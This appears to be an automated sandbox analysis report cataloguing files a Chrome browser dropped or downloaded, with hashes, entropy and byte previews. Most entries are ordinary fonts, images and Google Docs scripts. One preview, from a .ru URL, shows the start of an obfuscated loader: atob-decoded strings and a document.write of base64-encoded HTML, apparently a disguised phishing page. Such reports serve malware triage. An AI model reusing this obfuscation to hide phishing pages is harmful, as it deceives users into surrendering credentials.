                                                                                                                                                                                                                                        Preview:wOF2.......D......................................d...z..f.`?STATD..t...........\..6.$..4. ..\.....[.y.........v.}.$.oU...i+s.:o...,.}6"v;|t.......?9...i..PQtn..]..S....D.V..0s...N.y.4....."S....3.(...c..j%...-...Q........ .{.943.h.....N...}..P^Gt....._U.....\3P..k...q..C~...%..eCYv..>.....u.....Q..kJ..4Y.~%31R..2...H:.{...Ue.j.!j....-z..$.*a...$N.$>4I...l..a...._*?../.L.b....]..n4..Fe.j...&9U..j..NX...D.U.E.....).^.KR..t..........L.o..P..U`.z...N.G..~......8*<*$.....(Q@..$.*.$$O@J..+.".%RF......h..,..}....%.k.m....>.NF.....u.y...O.+...`.0;8..i..).;.z...|s....B..;...!R.kY.3..|.g..i.|.f7i:.J)t1dI....A.D.........%..T.U..h.D....a.'AHO.<.wo.y...B.'....1.e.....X.....G..q.M;K.p.x"M.Q.g.G..|X.w......."./n;.i.......b>..........*M.J.I!D..A...s..J!...<...hx7.n...t.-.r..m.$b....m.B....B....~*.:UI!...{.Bd..!,.=...r...@.d`..~...sw..d..E..=...C.U.$%.M!...Mz...O...`.W...2....N......R......9...F..r..'..?...{..h..a.../.@@.O*Z...:@......"y?>c....O..uw..h.H
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):13852
                                                                                                                                                                                                                                        Entropy (8bit):7.902890859926445
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:2m1WmRHTFW3g+/n4axk7MEJ8eRXW0lR3w8YhN/i:2EHJWz/n4pwEJnGw36hNq
                                                                                                                                                                                                                                        MD5:57F063ABAC5BD2B34C7D0966790D6017
                                                                                                                                                                                                                                        SHA1:CE1AD9B6FD3E1595C164D3670ACB3EEA99168E0A
                                                                                                                                                                                                                                        SHA-256:D0DEBBF2ABDF04249D3A16E06304FC2534889B3A7143BEA0C99D06169F4314BF
                                                                                                                                                                                                                                        SHA-512:BA8ACE696AE0C944A0E78DA75080249C6AA31FC747CF30F6446FB78F5429CF6156DA1230261E35494E9DC41C7F87DCE6ADB7D3E8117146184384EC1E94A1F8DA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(..5.IDATx.....@....J(..$...[/..\.g/.pv...@.....,.....@.....,....,@....@.....,.....@.....,....,@....@.....,@....@.....,.....@.....,.../.....WUD,....v....(..RU.TJ%.$.JR..l..E)TB)$U@.*..$..!H.......@. I.b.ko;.z.z...z.9..3.|.s.MMM..K~~~......|.K..,,,...>........5#..>88.;*.....TDDDee.........\rrrhh...b..nFGGonn....xcc...>66F..E:<<...._........VGG.zy..occ...y{{.^..U...fff*."............K...2.......:544x{{[YY...Q..1.......]]].....mnn.?**.....`a.,.....}}...KJJ...#&//...Z.'&&..F.[ZZ......*&*))...%.0D............x~....\.XR....... ...........s>xGG...~....YPPpqq...ELSS.....]YY.y.....\]]....W..t...y...1.(s4.... ..1........b{{{.....>...........Z`uvvB....+.`.E*EJ.K.......`..iii...555.)|.{{{j$\.......{KK.:.......M..X...U...#.....Y..U.EN.....!.D..jK....X.Q.Ba.555E...gEJ.K.....Nss3....r.v.)...m$m D.W.).S111..YX...5.;.}.%A..u.........8.@......X..+R.XR.j.U......k-T=|.*.......rrr......,j.v......I.%...[[[..X<?a......S.$....,F?......a.....
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (554)
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3042839
                                                                                                                                                                                                                                        Entropy (8bit):5.6009035384571035
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:CNti6k5R/DzpwztJOPgUF8A/lMalnK1vzW0i:CUOIh
                                                                                                                                                                                                                                        MD5:7109DE581EF1F93730E3BA319B4852C0
                                                                                                                                                                                                                                        SHA1:2394F75C654CD99421A0B9C1357D95D5D7FFBA5D
                                                                                                                                                                                                                                        SHA-256:C901877DB828E46F5BEB3FA7CA88F21A69BD932B525F165DFC9681EBC7C009BA
                                                                                                                                                                                                                                        SHA-512:2A1CAAF7C90C4F48164CF4256588B858E0122F6F58695444F4E8033EB1EC7390D019FB483DFE084F3BA04F52253C84B0D3516F118405EC90371DF6C962AD03CE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview://# eagerCompilation=all.function _F_toggles_initialize(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]}_F_toggles_initialize([]);./*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT.*/./*. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2024 Google, Inc. SPDX-License-Identifier: MIT.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var ba="\r\n",ca=" (",aaa=" and the blob url is revoked by ",baa=' style="display: none;"',n='">',da='"></div>',ea='"></div></div></div>',fa='"></div></div><div class="',ia='"><div class="',caa="#$1$1$2$2$3$3$4$4",daa="#000",ja="#000000",eaa="#0000ff",faa="#0096fd",gaa="#009ef5",haa="#00ffff",iaa="#0b5394",jaa="#0b57d0",kaa="#1155cc",laa="
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 1416, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):1416
                                                                                                                                                                                                                                        Entropy (8bit):7.811377924682188
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:N2bmsAaPNl1Yn3NXvem3NhvRcpd8CE/LZnnrHrEV9bw+k1kjXriNClDuK/PVa1Fp:OmsAaPNl29Xb37vRcpdO5Ezbw+ukjXrg
                                                                                                                                                                                                                                        MD5:E2D07BCC7B3C68F09F3517CD26B496A9
                                                                                                                                                                                                                                        SHA1:1BC266CB846B248865B43E53CCD7C8117A70B7BA
                                                                                                                                                                                                                                        SHA-256:CC93B0C6CCF01063B9788530CA2389636059624B18599DE8EDEF8D4054255474
                                                                                                                                                                                                                                        SHA-512:35DA3761609813625AD4A9FDF9253617CE61EE350F08B2915ED38C66A50DDC2AD35B5D0D0E4B8993103E4E40A116621FE2AF2D0A9C4D71D18F9B1098B82215D0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/robotomono/v23/L0xuDF4xlVMF-BfR8bXMIhJHg45mwgGEFl0_3vq_QuW4.woff2
                                                                                                                                                                                                                                        Preview:wOF2...................1.........................4.`?STATH.d....x.=....6.$... ....6.....Q.0N.....1.C\*...d..T...'K.......s..fC..h.....F..fiM.m%j . .B.(.40fBM..9...S/M})...K..6.j...?.ok....n?Dv}..?_W..V....Ewo....Y..x............<._7"Pa.Hd....r.E..n6:.::/}H.dP<...w\..... z.....H)'...,....Y.....e...b)...k...2..<l..8...~gY.U.M"R!.zM2.\zM\.|...c......@..0....h...s.#...]r`.!}....4..d.&......gf..n.d.....v>|s.P__G..GKBa1w!...#!.A.....mNq...Bw.P"p...J..5.....D..Q'...B..L....CK.. [T$,.`.G...IP,Y....A.J.l$6..A.}...`..8..;..]u....&.[....m.@..]z..C......'Z+.l.4*..Xc.. ...%.d....x.s_e..P..J,...81#...>........+.8.K!...E-C...%.,......'.....2{Uy.4.....xH.....B.......Mfn......`.q.X7u0r0...q....q..d...O.b$'...r.:PW.C....P..S....XS...2.....K..P...u.S.bd.@k..'.o.:.z.=...?/.y..m~>#\..._.Fi..w[[.<.t.i.cG...8..`.d..R.9.L....D......4.`.@@$Xjp}.1l.G....]$.;..L...9.E..o..\..e..#...f..p.=.~.qp..)J......".L....:..].....oS.u&....F.6.....5....H5.eai..~..x.[F...E..y.7l.m...s...
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (8225)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):104371
                                                                                                                                                                                                                                        Entropy (8bit):5.768403224622953
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:IccKUwdystkb/NTMr8XKWRNIGBrrt/9+gu9uvjPq:RUQysmb/N4EK+IWSgBzq
                                                                                                                                                                                                                                        MD5:72F9C31A344E3B2DE6662D58FCFD5329
                                                                                                                                                                                                                                        SHA1:3072C23BD415B648A0A5235D23409FBBB1ADCAE9
                                                                                                                                                                                                                                        SHA-256:B6F153516181FC486DF78C6977B8F072735EBA4A6C8747FD7535C02870F00829
                                                                                                                                                                                                                                        SHA-512:A18ED4A432A5C502445239757D490C090FBF86940BA9D62CA95C77E1D061D46F1BB4F47C0CAC7A3CF3BBF6ED8FE4CEFC5B6FB08F22B3C6BB9A3702A7275B50C7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://docs.google.com/static/document/client/js/1227232233-client_js_prod_kix_pre_tertiary_deps.js
                                                                                                                                                                                                                                        Preview:var gil="kix_pre_tertiary_deps";mK(gil);.var hil=" at ",iil='" alt="">',LZ='"><div id="',jil="/drive/v2internal",kil=";base64,",lil="ASSET_COUNT_EXCEEDED",mil="ASSET_MEMORY_EXCEEDED",nil="AVAILABLE",oil="BAD_REQUEST",pil="COMMENT_COUNT_EXCEEDED",qil="CONTENT_REVIEW",ril="CONVERSION_INPUT_TOO_LARGE",sil="CONVERSION_OUTPUT_TOO_LARGE",til="Can't import this file right now. Try again later.",uil="Close banner",vil="Couldn\u2019t load user",wil="Description",xil="Dismiss banner",yil="FILE_TOO_LARGE",zil="Got it</span></div></div>",Ail="INTERNAL_SERVER_ERROR",.Bil="MAX_CELLS_EXCEEDED",Cil="NotReadableError",Dil="ONLINE",Eil="RESPONSE_TOO_LARGE",Fil="Revision no longer available",Gil="SHA-256",Hil="SHEETS",Iil="SLIDES",Jil="SecurityError",Kil="Today",Lil="USER_QUOTA_EXCEEDED",Mil="USER_RATE_LIMIT_EXCEEDED",Nil="X-Goog-Drive-Resource-Keys",Oil="abuseIsAppealable",Pil="abuseNoticeReason",Qil="accept-language",Ril="alternateLink",Sil="anyone",Til="application/json",Uil="application/json; charset
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):937
                                                                                                                                                                                                                                        Entropy (8bit):7.737931820487441
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:2PUSIn/IylOgX9qCigRmHQxlCNebarFY9:2PLCHlOgXQ9Oie+rw
                                                                                                                                                                                                                                        MD5:FC3B7BBE7970F47579127561139060E2
                                                                                                                                                                                                                                        SHA1:3F7C5783FE1F4404CB16304A5A274778EA3ABD25
                                                                                                                                                                                                                                        SHA-256:85E6223AFDBD5BADF2C79BCFBAA6FE686ACAA781ECA52C196647FFABB3BE2FFE
                                                                                                                                                                                                                                        SHA-512:49FA22DE92BEBEDE28BB72F7C7902C01D59E56723811629E40C8A887E34FD0B392A9DF169A238BDD8E46D984E76312D75B2644B8611C66A71A559C1B6834DE6C
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://developers.cloudflare.com/favicon.png
                                                                                                                                                                                                                                        Preview:.PNG........IHDR... ... .....szz.....pHYs...........~....[IDATX..KHTQ..g...&....!pY-.q.-B.H....Q`HY.wL.L....D....M.hS.H.w..wF..y|..s.9..2.6s..w.....}.9........m.{"."q.Q..x.ZO..h.U.y.3.].^.M. .0...D7L...D....w...a$}/u..)n....@......8.V.y6..X..U.QgA.\.Q.F..~.>..'......g.=.2..VW..\....`1d......q..........6...Y...L.g9....l.-...z.t.CE|...d5...b..H?....4...+.J.....9.E..-. ..R$.D.S....7...b..i..\q.?0..9....,d&...mw.L..&N.FpM"...;.......O[db/...-....Q<..WDhN.nu....%...m......A.S.._.>w...0.u..TJ...)......u..(=.!.."zTE0....J....ki#..n0..^.._"..D.....u..p.*=.&d..1....8...f.kR.3G6.t....Vcl.o=~/.$./...I.....$............(]...9.,...i....e... ..........._....@.h./......./U2Nd..........U..|...{.(...y....`.|....z\..z.@.o5...-...O.T.TL).5...y.m.......zZ........:..B..i..w...?!...m-xi.....;...e.0.A...W.}..E...u......h0O./...U..jA..., ..{.(......._=.w#.~..<..g.Vz....o@.e...........2.....T....IEND.B`.
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):14365
                                                                                                                                                                                                                                        Entropy (8bit):7.881211916978825
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:c1cqDphBfgHiqCJi/qc0OtwmJ/P9YZvx+V9B:6jdgrrj0Otww3B
                                                                                                                                                                                                                                        MD5:F19627756DF8AFCE4F7C343B17016F54
                                                                                                                                                                                                                                        SHA1:59CD4AD429E2C83481A368BEDA6124E44C70A4F5
                                                                                                                                                                                                                                        SHA-256:17059F06C71697CA310E9E6D8259CAACFB6F9C8B427D50C0DB333E52D0D739AE
                                                                                                                                                                                                                                        SHA-512:C74F71122B2C4BC7646757FC5A96C70A897D5C61259A5AB56E6871932C62F928C756F112D131DA9924B080DC735CFC6166AC90378E87861D0E841CE9382F1924
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://ssl.gstatic.com/docs/templates/thumbnails/16SJHsjNBjt4L1i0skDue83Q6FSsFpUWQA9fGTIxApvo_400.png
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(..7.IDATx...A.....0.....9..2.2}.@e.@X..... ,.a........a...@X..... ,@X..... ,.a............@X..... ,@X..... ,..a..SMG..Q...m...N....Y^..o[d`.i..2.x.nh*..,.]#.,.8.=.D....4t......w....2....B..g..7..(.....u.C,V........A..(@..k....\$8uUA.E....E.:....Y............P$...."K@.2...E.V.T.v.A.(..?.Q..t./l.m.m.........J*.f.Q%...g..nQQ...^_o..iomi....i.11...s...0>>nw{.....e..;[.......jin.ZLS...g<....D!......>......%%.&....c..g6@.........z]fF...zsS#.W....j.....1.........N7y+...w.[.......5..]...:.J!j.....-/-....l..z.6.X.6 5=9..`Z_[1.Hjb|...<8(.. ...*.'\.]VWU....H8..(/.A$......,..`eef.....T.,...e.........8f.q;..........8..%%%2F...&..NO.altd...b6..\.1.C...;.`*b;..9.....k.&....=:2LbGmX.F.$..LM.\c..uzrDP?>:D....t..HP........`4......*P.|..4D...0.Wj...,.QO2:.......4.... ...T......`..".X.....`.62<..X"..h's.1...V.E........F.Nj..M...F..O..>....cC70.....X..k}..9.\YZ.XZ.J...lsc......Ij....V..%o.`....`....?.XP...,&.M..q......Cj.X.U.d2.....q{3
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 3868, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):3868
                                                                                                                                                                                                                                        Entropy (8bit):7.9445535347732665
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:tlcEXWJVsupXQ0scIkvIEXKDhZBvoKugKyQ1lt:tlPZupX9MEsZBvAzyQ1X
                                                                                                                                                                                                                                        MD5:162BFED84902AE22C4B6E7F3B359D9A9
                                                                                                                                                                                                                                        SHA1:4DE2F221539118A48EFDCD673399506B75E49910
                                                                                                                                                                                                                                        SHA-256:C837D1781023E674AD4077973A7DDF830E90D8CFAE99DC5061550E174A3F08E9
                                                                                                                                                                                                                                        SHA-512:6EEF0E71069144E19FC027CF99C4A15B3B45D7B684F31C8FDB0825E10DF1B3FE05AA5DE6359288F1E60DA0889C636B2BBD5D34C0BF02C0D0D13A72299455A3F1
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/montserrat/v29/JTUHjIg1_i6t8kCHKm4532VJOt5-QNFgpCtr6Hw_aXo.woff2
                                                                                                                                                                                                                                        Preview:wOF2................................................6...`?STATH.l.|.......8.~....6.$.6. ..~.W..(...Q./......5$..qp..J)Q....J.. 0<7...&/.v6B.Y....w.jS.[..%..:.....49.h....n..f2..@e.).J'K.BMBC.a..R.JW.....'.%V..c.^@....5....\.\....X.......o..<.......U.P....>....Z.6.J%<...Y.+i.[..^/..i.....<..4.. X^..).YmI.'y...]4.'..0....{.....B+X.lP.^?2......Pz...tj.......@...t^.WS.....$.j3...x.]H...j..i.T.....?..?....G..v...-B.M..O_..|.2.-1...,c....`.~iM.X..qscj..6.vn..%.........<.`.~,.............E..f.,.@..z...M...?....Ax.h=R.....e.....Ff(....-,....*....G.....Y.Co..#.eU.K....".wv...&W.BHE...?1.,.3.d.*5.........[.........;...y....]Y....]r.UW^q..g.~..../..o.~....gO.<~....{w..u...kW'..0uW._...Xsa..u...=s..l.k..>....QX.)\.,z."..tK....*.|..i..6..1..T.JV.Ah...}.#.)-..\..ju..N.U..d.j=P.:...L.+#.U..n..b.5..M.xA&@..M.`..V....1.|.C....f.f.)...m=WzM.PD5`...1..G.8C............fP..O. ...Q..7..4....1..q.m...L}I...*...b.G.....MLV ~.1.b..W..$..$...#Gi$.$...N..2.Oj.X{Y....j
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (65364)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):195787
                                                                                                                                                                                                                                        Entropy (8bit):4.713155953310208
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:UZvAf7IbRJupXXYO5voXakGFZvAf7IbRJupXXYO5voXakGCLBv3LBvz:eRJ4DDRJ4DSF7
                                                                                                                                                                                                                                        MD5:A6854A2E6F57D5A23B2E3380F6EF6641
                                                                                                                                                                                                                                        SHA1:08890B89E1B242ACB3BB38A31B2865BEE54B3E2C
                                                                                                                                                                                                                                        SHA-256:0E16FA2BE8CF9ED6AB93E8DA2B0A05B4C23756DB6BE6869DF835FA7AE234CBF4
                                                                                                                                                                                                                                        SHA-512:E14142A8D6BE1E6B0CEDA24E0059A087D42DEAFE710018A0C284CD65E5C65F8357486678F507C76800F38726A5CB8F3117C275BBCBF10AFCDE1814E549A417DD
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://2ya.leyapham.ru/zdvftqs/
                                                                                                                                                                                                                                        Preview:<script>.JFRZLKGNmo = atob("aHR0cHM6Ly8yWWEubGV5YXBoYW0ucnUvemR2ZnRxcy8=");.BSavMNxtKV = atob("bm9tYXRjaA==");.wNbOAsoxtA = atob("d3JpdGU=");.if(JFRZLKGNmo == BSavMNxtKV){.document[wNbOAsoxtA](decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+CjxodG1sPgo8aGVhZD4KICAgIDxsaW5rIHJlbD0iaWNvbiIgaHJlZj0iaHR0cHM6Ly9kZXZlbG9wZXJzLmNsb3VkZmxhcmUuY29tL2Zhdmljb24ucG5nIiB0eXBlPSJpbWFnZS94LWljb24iPgogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJJRT1FZGdlLGNocm9tZT0xIj4KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPgogICAgPHRpdGxlPiYjODIwMzs8L3RpdGxlPgogICAgPHNjcmlwdD4KICAgIGNvbnN0IHpaRVRHZkhYQUYgPSB7CiAgZ2V0KE11Z2hTdU9Zd1YsIFZRVFhqSmpaWlYpIHsKICAgIGNvbnN0IGZUV1VBYUdKT2UgPSBbLi4uVlFUWGpKalpaVl0KICAgICAgLm1hcChiUVFFb2FHTkRjID0+ICsoJ+++oCcgPiBiUVFFb2FHTkRjKSkKICAgICAgLmpvaW4oJycpOwogICAgY29uc3QgZU9aQ1BsU0VCQyA9IGZUV1VBYUdKT2UucmVwbGFjZSgvLns4fS9nLCBGcm5leldBcGN
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):27271
                                                                                                                                                                                                                                        Entropy (8bit):7.979850504525943
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:Z9w16tVaAvdV8Tka8jyoRNX5sIxKOKpGgiX/:ZXEmOkgoRjhYdm/
                                                                                                                                                                                                                                        MD5:2D31E3052FF39F242168A03DC2188C59
                                                                                                                                                                                                                                        SHA1:30FB901A67CF2DA592FB95D89FCE50D6F7807B71
                                                                                                                                                                                                                                        SHA-256:34758C07D1CAF247CA117768EB74D15EA622F008D0BD4F5ABC56EE91A5CE8C11
                                                                                                                                                                                                                                        SHA-512:B638D18A80526B3E11D7AC17137F3498B295BE05B1B24206F4A8E782585393A4F6DED970BD1396A3FCF760A0797397A75B7F1CCC9353C3ACA49B0B5F0EADA664
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(..jNIDATx.....a...O.@.....@h..I{.Ak.E@...!.%GH.\K.!.{C.......a............@X..... ,.a.......J........a...@X..... ,@X..... ,.a.........H.=...c3.DI.s{[M...:~..L...t.Da..x..r.......]d..@.a........a...@X..... ,@X..... ,.a.....4....9@.vax....Nm.m35..6..m.m7(b........ .;.gr......L.;.{j.K[._.r..]-M.at..1..@.....+R.u.ya....a...Z.R..w.^...F...tC'.[.#.*..L*.s..z......:....T.1.........#.....G..}M..).........'b...aU;...>.m6R.i....p4,\...W.O-...'..$$&..II.+.,.g.f..-.M......E......3~k4XZ...L...x.....j.n`>.{z.........\\[......hG..&E.....`...W..:Y2..l.O....bN..........%.~../..]kg.{.&.e.e.{..v..5..p...V.H...1......q..+..c.-)....."iK.rM3Q&.!.MVb.......u)...M.{...s.w....E...Q.(s...RngXg'..$F7ly|.~..%...F).G..F.g.....kl.n..f$...3..k_....J7..d...5.......KR.;.nP.>..%fF.3e............d........7.!..y}....%.R.G...sZ;.g1............D..E....rZ.....D.?..z....!$...N.I......l.d....B..L-.....z.....{.......\.-./X.f.F..p.q..!.......p
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):17482
                                                                                                                                                                                                                                        Entropy (8bit):7.927963830851311
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:6/BIREYZe03V3IgghRaVKINENCjC2I6DjQnbbdBeOuCUkHEfIZr11q:oi2kehRaVBNENoIG0bBBjEkkw111q
                                                                                                                                                                                                                                        MD5:BB9380FD8B95D92BFC95B024793DF18E
                                                                                                                                                                                                                                        SHA1:F5C22C5BF6868779BBD7AF9D9FB22B387F184765
                                                                                                                                                                                                                                        SHA-256:DC137D943C0F79AE2BABE4FF6B7F5982046E8EA373CF0DDF158031A95FA3423B
                                                                                                                                                                                                                                        SHA-512:7D8B54A7890368DCC154E107C368A40ABC67E02E119F78F56D9C35B66423A7955F024F2FCC22CC9A9BBBC37AF071C6A7CCF07E7AAB8700D0BC983D07B4E936BD
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://ssl.gstatic.com/docs/templates/thumbnails/12p3gZhafPC_RbrLQfWbpG1eLJom6b8Tw5JPUQ_28PJ8_400.png
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(..D.IDATx...A.....0....}9....[...... ,@X..... ,.a............@X..... ,.a........a...@X..... ,@X............... ....Q.F....f.....m.m.m.v..d..qRl2.....s....kan...q.w..h........skc....y....S.c.............][Y......\..)..3b.{.:.q..zV..9.....3. .Y#As3.$N...`}=..l........$..ygk.`&.F.canFX..f.......hc.GN.,X........SS..l;.[MM...,.*..................xC.}.++)%...LO.8q..262lj....*..e^<........$1.....8...O......d....?...|1M.............H!..=}.D...hRLTC]MB|,..#X"oV...^.......prt.07C......o^.....U.e..K4.....A..."j..(.^...j...^|..-..*}.......),"X.n.D...X5U.4..).,a...Q.....wo.hki....JdD8G...c.+#-.... ...(......Q........\..@.. ........!X`.6.?..M.,.z....\).t....R...OC].__O......8?....g.........`....7.T.."#.^...b..;:..=j.......Y..8......5...:)$.`.....D.......|x...F=...........K6Y...v.tuL..h.x.A...".. X4t...stx0%)12<...,/........N.(..ap...0.dU....YZ......9...wI8.....D. 1H....4..@%SQV...J.-aiI.T.J%.=...`p...;.F.y...dQN.,X?7.e*....
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 65288, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):65288
                                                                                                                                                                                                                                        Entropy (8bit):7.995231949069373
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:fiRY633pYvbxy0Sip63WPUK3lnbRCw06C7Cjmf0Z/e:uYZvZhp63WPUK1nbRCIC7CjWr
                                                                                                                                                                                                                                        MD5:A4BA8684EDFDDEE2B96C4289802B59D8
                                                                                                                                                                                                                                        SHA1:A5E348D230BE06CA1183E2E179C797986270AAA4
                                                                                                                                                                                                                                        SHA-256:50F2422F6A75BB554D5A8DB39B42FBAB581C0811CA56C50AA47AF8BC14727C0B
                                                                                                                                                                                                                                        SHA-512:F90E9631C766E8E5DAD2D6A941DC89D982066F7A1AADD497A4BB9B9E6F2A46760EB0C7C7D613EF2DD79A4912F748173FC982EDFFD6FD451A47FB2303E92B7975
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/spectral/v14/rnCu-xNNww_2s0amA9M8qsHDafY.woff2
                                                                                                                                                                                                                                        Preview:wOF2...............\.......................................`.....d........`..>..x..6.$..l. ..P..K..o[....*.....G7W/.H...6@..Y....G.)..Z..h..y..n.g...nT.n..|...............'....z&...$@.....Cw.U..j.,.S..%....$M.JB.F.%L.....tA.........Ys.+kGyN...&..ns.*!.m...t.g.L...J.&e.'.C>H.2.u.:.;.^s]v..*.D. .e..z....'*-.W..*=....B}..N...t..+......iF.C..._p..o..,....M..r.P7...g.^.|.U.0../..wu(..D...]J..|P3..F..)..PVb.A..&.].=...o.j.se.....N.....(..i-..`.k...../%..a..y.....thUS.....4...^......St......!.....T.m.5......}..7.m!G}.,.9N|...&.....RQV...O....J.Ko.+.A..R.o../1..*y/SL.K..../8`i.$.g.E..Z.).1a...../.%...G........m.O.Rk.)R*...........H|R....I.$.........~.......|u...........+.o[^...Ex....v<]|.a{..1...$.xM&4.....X..j,f....p..j<...;N......5...7.!..h...$s..=..6.....C....Y.E.(..6EQ..H....C4.....l.......T....QD....,b.. .G..DT..,...F1bSk4.1.Fm.L...r..4...O.....<.2C"$..&.=..*)..!...r.h.......}.}.G.;.../"`..F.H.HA...).,,.DT....E..lZ7. ...p....c{.]..@.6I.X.Z.....[...
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 64968, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):64968
                                                                                                                                                                                                                                        Entropy (8bit):7.991086223648761
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:WHzRKTLYRYDl8vt4WqygfVfyjuCCjMto7zgxOb/LlItk41fR8V+pF:WGLRKwygfVfy5CAKIxOb/JItRL84pF
                                                                                                                                                                                                                                        MD5:38B24F2C1F13FF0FE4D75754439192B1
                                                                                                                                                                                                                                        SHA1:B85F7DC43D9DA69F8C5034F682D047EB3C5B6B9A
